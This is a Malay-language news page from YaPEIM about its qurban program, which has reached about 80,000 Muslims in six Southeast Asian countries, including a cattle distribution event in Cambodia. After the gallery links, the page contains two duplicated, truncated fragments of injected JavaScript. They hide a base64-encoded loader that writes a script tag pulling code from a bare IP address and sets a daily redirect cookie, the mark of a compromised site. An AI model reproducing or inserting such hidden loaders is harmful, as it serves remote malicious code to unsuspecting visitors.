YaPEIM » YaPEIM bantu 80,000 umat Islam enam Negara ASEAN

Terkini

YaPEIM bantu 80,000 umat Islam enam Negara ASEAN

80,000 umat Islam di enam Negara Asia Tenggara menerima manfaat daripada Program Ibadah Korban YaPEIM sejak lapan tahun lalu.

PHNOM PENH 7 Okt. – Kira-kira 80,000 umat Islam di enam Negara Asia Tenggara menerima manfaat daripada Program Ibadah Korban Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) sejak lapan tahun lalu.

Presiden dan Pengerusi Lembaga Pemegang Amanah YaPEIM, Dato’ Abd. Malek Awang Kechil berkata, selain Malaysia, negara terbabit ialah Indonesia, Thailand, Kemboja, Vietnam dan Timor Leste.

Jelasnya, bagi tahun in sebanyak 1,268 ekor binatang korban disumbangkan oleh para peserta program itu kepada penerima daripada kalangan orang miskin di negara-negara tersebut.

“Program itu telah dilaksanakan dengan kerjasama rakan-rakan kongsi yang merupakan pertubuhan bukan kerajaan (NGO) di negara itu.”

“Ini bagi memastikan ibadah korban yang dilaksanakan bukan sahaja menepati kehendak agama tetapi dapat dilakukan secara terancang dan berkesan sekali gus memberi manfaat kepada golongan sasar,”katanya.

Beliau berkata demikian dalam Program Ibadah Korban Perdana YaPEIM di Wilayah Kampung Channang di sini, hari ini.

Yang turut hadir Menteri di Jabatan Perdana Menteri Kemboja, Datuk Othman Hassan dan Presiden Cambodia Islamic Association (CIAS), Senator Mohammad Marwan.

Pada majlis yang dianjurkan dengan kerjasama CIAS itu, sebanyak 43 ekor lembu korban diagihkan kepada wakil dari 43 kampung di bawah Wilayah Kampung Channang.

Mengulas mengenai program korban di Kemboja, Abd. Malek menjelaskan, pelaksanaannya dapat membuka laluan kepada usaha membantu umat Islam di negara itu yang rata-rata masih hidup di bawah paras kemiskinan. – Utusan Malaysia

Galeri Gambar

Ibadah Qurban Kemboja

Ibadah Qurban Thailand

Ibadah Qurban Vietnam

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top